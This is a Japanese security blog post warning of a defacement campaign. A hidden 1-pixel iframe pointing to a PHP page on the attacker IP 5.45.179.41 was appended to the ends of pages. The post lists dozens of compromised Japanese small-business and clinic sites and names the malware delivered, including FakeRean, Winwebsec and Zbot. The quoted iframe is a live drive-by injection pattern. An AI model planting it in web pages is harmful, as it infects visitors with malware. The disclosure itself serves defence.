iframeサイト改ざん 5.45.179.41 transport replys-terribly-reading_works


ページの最後尾に不審なIFRAMEタグが挿入されるサイト改ざん! 先日のこの攻撃者と同じかなぁ?



</body>
<!-- . --><iframe width="1px" height="1px" src = "http // 5.45.179 41 / transport / replys-terribly-reading_works.php" style="display:block;" ></iframe>
<!-- . --> </html>


たとえば、さくらインターネットのIPアドレス 210.188.218.177 のサーバーで稼働してる日本国内の一般サイトが軒並み改ざんされてる風味。 イメージ 1



832. be
agescollection. com
aozorasr. com
ayasemengyou. com
bbc-hair. jp
beauty-go. jp
calypso. jp
cherish-salon. com
clesc.co. jp
cramschool. jp
cutchan. com
daigo-tsukemono. com
dear-corp.com
familyresort.co.jp
firegarage. com
hairmake-buzz. com
hinokuma. info
im-home.co. jp
inagi-ah. com
invatec. jp
jikei-boshi. jp
kuryu-ds. com
mizuhikiyasan. com
nespa. com
oakshika. jp
ps-eddie. com
sense-i.co. jp
shinzougeka. com
tateyama. biz
tdc-circ. jp
tonno. jp
triple-ef. com
unpas. jp
vesta-1. com


美容院、大学病院なども多彩なウェブサイトで。


無料ウイルス対策してない訪問ユーザーをターゲットにドライブバイ・ダウンロード攻撃で何かしらウイルス強制インストール! 偽セキュリティソフトネットバンクのスパイウェアの餌食になてしまうー!


Win32/FakeRean Win32/Winwebsec Win32/Zbot